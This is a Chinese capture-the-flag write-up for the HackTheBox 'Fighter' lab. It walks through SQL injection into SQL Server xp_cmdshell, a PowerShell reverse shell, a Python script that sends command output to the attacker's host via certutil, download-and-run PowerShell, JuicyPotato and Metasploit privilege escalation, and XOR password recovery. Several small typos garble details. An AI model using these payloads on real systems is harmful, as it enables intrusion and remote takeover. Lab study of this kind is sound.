Fighter是一个非常困难的靶机,知识点涉及子域名扫描、SQL注入、SQL server命令执行烂土豆提权
逆向工程等。感兴趣的同学可以在HackTheBox中进行学习。
通关思维导图
0x01 侦查
端口探测
首先通过nmap对目标进行端口扫描
nmap -Pn -p- -sV -sC -A 10.10.10.72 -oA nmap_Fighter
扫描结果显示目标只开放了80端口
80端口
访问后发现这是一个游戏“街头霸王”的封面
使用 gobuster 对站点进行目录扫描,但是未发现敏感目录
gobuster dir -u http://10.10.10.72 -w /usr/share/wordlists/dirbuster/dire
ctory-list-2.3-medium.txt
子域名探测
查看网页时发现域名streetfighterclub.htb,推断可能存在子域名
修改 hosts 文件完成域名解析
vim /etc/hosts
# 配置
10.10.10.72 streetfighterclub.htb
使用 wfuzz 扫描目标的子域名,成功发现members子域名并将其添加至hosts文件当中
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u streetfighter
club.htb -H "Host: FUZZ.streetfighterclub.htb" --hw 717
使用 gobuster 对members子域名进行目录扫描,成功发现/old目录
gobuster dir -u http://members.streetfighterclub.htb -w /usr/share/wordlists/dirb/big.txt
使用 gobuster 在该目录下进行文件扫描,发现login.asp
gobuster dir -u http://members.streetfighterclub.htb/old -w /usr/sha
re/wordlists/dirb/big.txt -x asp,aspx
访问该文件,可以看到这是一个用户登录界面
0x02 上线[sqlserv]
SQL注入
尝试登陆并使用burp suite 截取数据包,将其转发至 repeater 中进行测试
在参数 admin 和 password 添加单引号字符返回302,而在参数 logintype 添加单引号字符
返回500说明参数logintype 可能存在注入漏洞
然而尝试注入时目标的返回值与我想象的不一致
原因是在登录时未点击remember me选项,开启后再次尝试注入。成功获取参数 email 的值经过
base64 解码为admin@nowhere.com,说明存在SQL注入漏洞
但是使用 sqlmap 无法获取到数据,还是需要利用手工进行注入
命令执行
此处传递给存储过程的参数必须是常量或变量,因此不能使用典型的基于联合查询以及盲注的方法但是可以采用堆
栈查询,而在这种情况下,应用程序不会处理关键信息或具有更高权限的用户。因此我们需要转换思路,由于脚本
为asp.net,数据库很有可能是SQL server,我们可以使用 SQL server 中自带的 xp_cmdshell 函数用于命令执行。
参考文章:https://www.tarlogic.com/blog/red-team-tales-0x01/
首先开启xp_cmdshell函数
EXEC sp_configure 'show advanced options', 1; //开启高级选项
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xP_cmDsHell', 1; //开启xp_cmdshell
RECONFIGURE WITH OVERRIDE;
创建临时表#xxx
drop table #xxx; //删除#xxx表
create table #xxx (out varchar(8000)); //创建#xxx表
在表#xxx中插入语句构造反弹shell
Insert into #xxx (out) execute xp_CmDShell 'c:\WinDOWS\SYSWoW64\win
DoWSpOwERsHEll\V1.0\PoWerShell.EXE "
$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.17\",80);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"^> \";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()
};
$client.Close()"'; //将powershell反弹shell命令写入其中,并通过xp_cmdshell执行
EXEC sp_configure 'xp_cmDsHeLl', 0; //关闭xp_cmdshell
RECONFIGURE WITH OVERRIDE;
经过整理后完整语句如下
- 1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cm
- DsHell', 1;RECONFIGURE WITH OVERRIDE;drop table #xxx;create table #xxx (out varchar(8000));Insert into #
- xxx (out) execute xp_CmDShell 'c:\WinDOWS\SYSWoW64\winDoWSpOwERsHEll\V1.0\PoWerShell.EXE "$cli
- ent = New-Object System.Net.Sockets.TCPClient("10.10.14.17",80);$stream = $client.GetStream();[byte[]]$
- bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -Typ
- eName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sen
- dback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($send
- back2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';EXEC sp_confi
- gure 'xp_cmDsHeLl', 0;RECONFIGURE WITH OVERRIDE;
在本地监听80端口
nc -nvlp 80
将用于注入的 payload 进行 url 编码并通过 http 登录请求包发送数据
- POST /old/verify.asp HTTP/1.1
- Host: members.streetfighterclub.htb
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 108
- Origin: http://members.streetfighterclub.htb
- Connection: close
- Referer: http://members.streetfighterclub.htb/old/login.asp
- Cookie: ASPSESSIONIDQCTBSqqR=NMDOMHPALLEHCPAAIMOPNKHL
- Upgrade-Insecure-Requests: 1
- username=admin&password=admin&logintype=%31%3b%45%58%45%43%20%73%70%5f%63%6f%6e%66%
- 69%67%75%72%65%20%27%73%68%6f%77%20%61%64%76%61%6e%63%65%64%20%6f%70%74%69%6f%6
- e%73%27%2c%20%31%3b%52%45%43%4f%4e%46%49%47%55%52%45%20%57%49%54%48%20%4f%56%45
- %52%52%49%44%45%3b%45%58%45%43%20%73%70%5f%63%6f%6e%66%69%67%75%72%65%20%27%78
- %50%5f%63%6d%44%73%48%65%6c%6c%27%2c%20%31%3b%52%45%43%4f%4e%46%49%47%55%52%45
- %20%57%49%54%48%20%4f%56%45%52%52%49%44%45%3b%64%72%6f%70%20%74%61%62%6c%65%20
- %23%78%78%78%3b%63%72%65%61%74%65%20%74%61%62%6c%65%20%23%78%78%78%20%28%6f%7
- 5%74%20%76%61%72%63%68%61%72%28%38%30%30%30%29%29%3b%49%6e%73%65%72%74%20%69%
- 6e%74%6f%20%23%78%78%78%20%28%6f%75%74%29%20%65%78%65%63%75%74%65%20%78%70%5f%
- 43%6d%44%53%68%65%6c%6c%20%27%63%3a%5c%57%69%6e%44%4f%57%53%5c%53%59%53%57%6f%
- 57%36%34%5c%77%69%6e%44%6f%57%53%70%4f%77%45%52%73%48%45%6c%6c%5c%56%31%2e%30
- %5c%50%6f%57%65%72%53%68%65%6c%6c%2e%45%58%45%20%22%24%63%6c%69%65%6e%74%20%3
- d%20%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%53%6f
- %63%6b%65%74%73%2e%54%43%50%43%6c%69%65%6e%74%28%5c%22%31%30%2e%31%30%2e%31
- %34%2e%33%5c%22%2c%38%30%29%3b%24%73%74%72%65%61%6d%20%3d%20%24%63%6c%69%65
- %6e%74%2e%47%65%74%53%74%72%65%61%6d%28%29%3b%5b%62%79%74%65%5b%5d%5d%24%62
- %79%74%65%73%20%3d%20%30%2e%2e%36%35%35%33%35%7c%25%7b%30%7d%3b%77%68%69%6
- c%65%28%28%24%69%20%3d%20%24%73%74%72%65%61%6d%2e%52%65%61%64%28%24%62%79%
- 74%65%73%2c%20%30%2c%20%24%62%79%74%65%73%2e%4c%65%6e%67%74%68%29%29%20%2d%
- 6e%65%20%30%29%7b%3b%24%64%61%74%61%20%3d%20%28%4e%65%77%2d%4f%62%6a%65%63%
- 74%20%2d%54%79%70%65%4e%61%6d%65%20%53%79%73%74%65%6d%2e%54%65%78%74%2e%41%
- 53%43%49%49%45%6e%63%6f%64%69%6e%67%29%2e%47%65%74%53%74%72%69%6e%67%28%24%
- 62%79%74%65%73%2c%30%2c%20%24%69%29%3b%24%73%65%6e%64%62%61%63%6b%20%3d%20%
- 28%69%65%78%20%24%64%61%74%61%20%32%3e%26%31%20%7c%20%4f%75%74%2d%53%74%72%
- 69%6e%67%20%29%3b%24%73%65%6e%64%62%61%63%6b%32%20%3d%20%24%73%65%6e%64%62%
- 61%63%6b%20%2b%20%5c%22%50%53%20%5c%22%20%2b%20%28%70%77%64%29%2e%50%61%74%
- 68%20%2b%20%5c%22%5e%3e%20%5c%22%3b%24%73%65%6e%64%62%79%74%65%20%3d%20%28%5
- b%74%65%78%74%2e%65%6e%63%6f%64%69%6e%67%5d%3a%3a%41%53%43%49%49%29%2e%47%65
- %74%42%79%74%65%73%28%24%73%65%6e%64%62%61%63%6b%32%29%3b%24%73%74%72%65%6
- 1%6d%2e%57%72%69%74%65%28%24%73%65%6e%64%62%79%74%65%2c%30%2c%24%73%65%6e%6
- 4%62%79%74%65%2e%4c%65%6e%67%74%68%29%3b%24%73%74%72%65%61%6d%2e%46%6c%75%7
- 3%68%28%29%7d%3b%24%63%6c%69%65%6e%74%2e%43%6c%6f%73%65%28%29%22%27%3b%45%58
- %45%43%20%73%70%5f%63%6f%6e%66%69%67%75%72%65%20%27%78%70%5f%63%6d%44%73%48%6
- 5%4c%6c%27%2c%20%30%3b%52%45%43%4f%4e%46%49%47%55%52%45%20%57%49%54%48%20%4f%
- 56%45%52%52%49%44%45%3b&rememberme=ON&B1=LogIn
成功拿到反弹shell
了解注入原理后我们还可以编写 python 脚本来直接获取反弹shell
import sys
import requests
import threading
import base64
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer
query_id = 0
def decode(data):
parser = HTMLParser()
try:
# We don't like Unicode strings, do we?
decoded_data = base64.b64decode(data)
except:
return '[-] decoding error'
return decoded_data.decode('utf8', errors='ignore')
def get_command():
try:
cmd = input(':\> ')
t = threading.Thread(target=send_command, args=(cmd,))
t.start()
except:
sys.exit(0)
def send_command(cmd):
global target_url, local_url
payload = "2;"
payload += "declare @r varchar(6120),@cmdOutput varchar(6120);"
payload += "declare @res TABLE(line varchar(max));"
payload += "insert into @res exec Xp_cmdshell %s;"
payload += "set @cmdOutput=(SELECT CAST((select stuff((select cast(char(10) as varchar(max)) +
line FROM @res for xml path('')), 1, 1, '')) as varbinary(max)) FOR XML PATH(''), BINARY BASE64);"
payload += "set @r=concat('certutil -urlcache -f http://10.10.14.17/',@cmdOutput);"
payload += "exec Xp_cmdshell @r;"
payload += "--"
# Data for login
login = {
'B1': 'LogIn',
# 'logintype': "1 AND ISNULL(ASCII(SUBSTRING((SELECT @@versio
n LIMIT 0,1)),"+str(limit)+",1)),0)>"+str(char),
'logintype': payload % (cmd),
'username': "admin",
'rememberme': 'ON',
'password': "admin",
}
requests.post("http://members.streetfighterclub.htb/old/verify.asp", data=login)
class MyServer(HTTPServer):
def server_activate(self):
# get first command
get_command()
HTTPServer.server_activate(self)
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def log_request(self, *args, **kwargs):
return
def log_message(self, *args, **kwargs):
return
def do_GET(self):
global query_id
self.send_error(404)
# Certutil sends 2 requets each time
if query_id % 2 == 0:
output = self.path
# if command output, decode it!
if output != '/':
print(decode(output[1:]))
# get next command
get_command()
query_id += 1
if __name__ == '__main__':
# Fake server behaviour
handler = SimpleHTTPRequestHandler
handler.server_version = 'nginx'
handler.sys_version = ''
handler.error_message_format = 'not found'
# Add SSL support if you wanna be a ninja!
httpd = MyServer(('0.0.0.0', 80), handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
0x03 权限提升[system]
查询内核漏洞
查看系统信息,操作系统版本为 Windows Server 2012且在安装了多个补丁
systeminfo
将其复制至systeminfo.txt后使用 Windows-Exploit-Suggester 查找内核漏洞结果显
示我们可以使用 ms16-075 等内核漏洞进行提权
python windows-exploit-suggester.py --database 2021-05-18-mss
b.xls --systeminfo systeminfo.txt
与此同时检查了防火墙配置,发现目标已开启防火墙且仅开放80端口用于通信
netsh firewall show config
烂土豆提权
尝试使用烂土豆绕过防火墙进行内核提权。上传JuicyPotato.exe至靶机
certutil.exe -urlcache -f http://10.10.14.17/JuicyPotato.exe C:\windows\syste
m32\spool\drivers\color\JuicyPotato.exe
在 nishang 脚本Invoke-PowerShellTcp.ps1末尾添加反弹shell的 payload
cp /root/Desktop/nishang/Shells/Invoke-PowerShellTcp.ps1 .
## 配置
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 443
在本地监听443端口
nc -nvlp 443
创建 bat 文件用于执行反弹shell
cmd /c "echo powershell iex(new-object net.webclient).downloadst
ring('http://10.10.10.14.17/Invoke-PowerShellTcp.ps1') > mac.bat"
在烂土豆利用的参考文章中寻找CLSID,我们可使用 widnows server 2012 的 TrustedInstaller 服务的
CLSID:{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
参考地址:https://github.com/ohpe/juicy-potato/tree/master/CLSID/Win
dows_Server_2012_Datacenter
C:\windows\system32\spool\drivers\color\JuicyPotato.exe -p C:\windows\system32\spool\driv
ers\color\mac.bat -l 1337 -t * -c {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
但我们未成功收到反弹shell,尝试借助 nps_payload 来创建包含 payload 的xml文件以便
靶机自带的 msbuild 执行。需要注意的是该脚本使用 python2 来执行,否则无法运行
下载地址:https://github.com/trustedsec/nps_payload
但是该脚本貌似只支持 msf
python2 nps_paylaod.py
使用 msf 监听443端口
msfconsole
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost tun0
msf > set lport 443
msf > run -j
上传新生成的带有 payload 的xml文件并放入临时文件中
certutil.exe -urlcache -f http://10.10.14.17/msbuild_nps.xml C:\windows\syst
em32\spool\drivers\color\msbuild_nps.xml
使用靶机自带的msbuild.exe运行 payload
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe C:\windows\sy
stem32\spool\drivers\color\msbuild_nps.xml
成功返回 meterpreter,但是权限仍为sqlserv,烂土豆利用失败
为了获取稳定的shell,我们将其注入 x64 位的 sqlservr 进程中
meterpreter > ps
meterpreter > migrate 1140
Capcom服务提权
在命令行模式下查看服务并没有发现可提权的服务
msf > shell
shell > wmic service where started=true get name,startname
但是在查询资料后我们发现”街头霸王“上有一个叫做 Capcom 的服务存在漏洞查询
服务成功发现该服务正在运行中
shell > sc query capcom
使用针对 capcom 服务进行提权,但是显示提权失败
msf > use exploit/windows/local/capcom_sys_exec
msf > set lhost tun0
msf > set lport 443
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set session 1
msf > run
我们需要在 msf 下进行修改相应利用脚本
cd /usr/share/metasploit-framework/modules/exploits/windows/local
ls
vim /usr/share/metasploit-framework/modules/exploits/win
dows/local/capcom_sys_exec.rb
注释其判断语句
重新加载 modules 并设置目标
msf > reload
...
msf > run
执行成功后获得 system 权限,在用户 decoder 和管理员的桌面上寻找flag
dir c:\users\decoder\Desktop
type c:\users\decoder\Desktop\user.txt
成功在用户桌面拿到第一个flag,而在管理员桌面上却只有root.exe、checkdll.dll执行root.exe需要输入密码。
0x04 逆向获取flag
逆向分析
首先将root.exe和checkdll.dll下载至本地
meterpreter > cd c:\\Users\\Administrator\\Desktop
meterpreter > pwd
meterpreter > download root.exe /root/hackthebox/Machines/Fighter
meterpreter > download checkdll.dll /root/hackthebox/Machines/Fighter
我们推断root.exe是基于checkdll.dll来解密的,因此需通过 checkdll.dll来逆向解析在IDA
中按shift+f12查看字符串窗口
点击 FmfEhOl}h 跳转至具体信息
然后点击 check+8 跳转,发现该动态链接库对变量 FmfEhOl}h 中的每个字符与9进行了异或那么我们
只需要将 FmfEhOl}h 中的每个字节与9异或即可获得密码
密码破解
根据以上原理我们可编写 python 脚本进行破解
for i in "Fm`fEhOl}h":
a = ord(i) ^ ord('\x09')
result = chr(a)
print(result,end='')
成功拿到密码为OdioLaFeta,尝试执行 root.exe
root.exe OdioLaFeta
输入密码后成功拿到第二个flag
总结:
整个靶场围绕街头霸王进行展开,发现主站点不存在利用点后我们在页面中找到了其域名,通过子域名扫描发现
子域名members,使用gobuster对其进行目录扫描后发现一个用户登录界面并在其中找到SQL注入漏洞由于该
站的脚本语言为ASP.NET,因此我们推测数据库为SQL Server,SQL server自带的xp_cmdshell开启后可执行系
统命令获取用户权限。在靶机中通过信息收集尝试利用烂土豆进行提权,与此同时我们还发现防火墙已开启且只
开放了80端口,通过烂土豆提权失败后我们尝试寻找可利用的系统服务,经过一番搜索后发现街头霸王自带的
Capcom服务存在提权漏洞,使用msf自带的Capcom提权脚本成功拿到系统权限,虽然在用户桌面上拿到了
第一个flag,但是没有拿到第二个flag,管理员桌面上只有root.txt以及checkdll.dll,使用IDA逆向分析
checkdll.dll发现密码生成规律,编写脚本可成功破解密码。最终我们可运行root.exe
并输入密码即可拿到第二个flag。 |
楼主